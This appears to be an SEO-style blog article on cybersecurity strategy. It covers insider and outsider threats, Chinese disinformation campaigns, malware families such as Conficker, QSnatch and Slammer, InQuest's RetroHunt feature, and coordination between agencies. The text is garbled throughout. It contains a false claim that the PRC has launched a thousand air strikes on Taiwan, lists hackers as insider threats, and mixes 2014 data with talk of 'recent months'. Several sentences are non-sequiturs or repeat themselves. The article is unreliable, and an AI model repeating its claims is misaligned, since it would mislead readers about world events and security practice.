If you’re a business owner or decision-maker looking to improve your cybersecurity posture, there are several ways to make a lasting impact. One of those methods is an effective adversary focused approach. It requires a collaborative approach from your organization’s security team, as well as other agencies such as the National Security Agency (NSA), the FBI, and others. While these agencies are important for your overall cyber defense, it’s not enough to just rely on them. Read on to learn more about how an adversary using public hosting exploits emerging threats.
80% of successful attacks originate with external threat agents
One of the simplest and most effective ways to defend your enterprise is to understand and appreciate the difference between inside and outside threats. It might seem like a no-brainer, but if your company is reliant on the Internet for communication, you need to be aware of the dangers.
Internal threats are those that originate from within your walls. These could include employees, contractors, or even the likes of hackers. Typically, insiders have a more personal connection to the data residing on your network. It is also more likely that you will find an employee who is inexperienced with the latest security and network technology.
Targeted attack campaigns in the Philippines and Taiwan
The Chinese government isn’t one to sit back and let the rest of the world do the heavy lifting. Last year, the country made good on its promise to launch a thousand air strikes against Taiwan. To help sway the locals’ opinions, the PRC has rolled out a bevy of information and social media campaigns. Having the requisite data points to draw upon means that the government can make use of some clever tricks.
The flurry of political spying not limited to the mainland either. The Chinese government has also rolled out several disinformation campaigns. They are staking claim to a slew of so-called ‘fake news’ websites. These sites often employ social engineering techniques to trick users into clicking on malicious links.
SALITY, DOWNAD/ CONFICKER, and GAMARUE malware families
During the second quarter of 2014, several global malware families exploited emerging threats. These new malware families enabled spam campaigns, ransomware scams, and remote control of infected PCs. These attack vectors reveal how attackers are abusing existing public-facing technologies.
QSnatch is one of the most prevalent IoT malware families. It targets QNAP NAS devices, preventing firmware updates and altering scheduled tasks. It also uses SSH backdoors to communicate with the command-and-control servers. It also installs additional malware.
The Slammer worm exploits a buffer overflow bug in Microsoft’s SQL Server and spreads rapidly, causing a denial-of-service condition on some targets. The worm has been a top ten malware family in recent months. This is how an adversary using public hosting exploits emerging threats.
RetroHunting
RetroHunting is a technique used to identify assets at risk, but it not limited to malware. In fact, the ability to detect and monitor anomalous activity can be an important part of a security team’s arsenal. It can also be useful for identifying attackers before they become public fodder. A tool called RetroHunt can help users find malicious activity in their network or database. In fact, the feature built into InQuest signatures. This makes it a viable solution for organizations that already use InQuest.
InQuest analysts can use this feature to build a robust threat profile by correlating artifacts discovered by the platform with data gathered from other sources. The most important thing to keep in mind is that this feature is only as good as its data. In other words, it is not a substitute for real-time monitoring and response. To take advantage of the feature, it is advisable to set up an InQuest instance. Moreover, a single user can run up to 10 RetroHunt jobs at a time. The maximum rule size also restricted to a meager 1MB.
Effective adversary focused approach to cyber requires coordination across all agencies
Whether your organization is a small, mid-sized, or large, an effective adversary focused approach to cyber requires coordination across all agencies. Government bureaucracies must transform to remove duplicative efforts and move toward real-time collaboration. These innovations can help overcome barriers to an effective cyberthreat response.
Defending against massive cyber attacks requires a coordinated approach. A critical component of this coordination is the alignment of national power. This requires a new set of innovations in government organization and technology. Developing an effective adversary focused strategy also requires that defenders understand the capabilities and vulnerabilities of the adversary, and calibrate their offense and offense standards.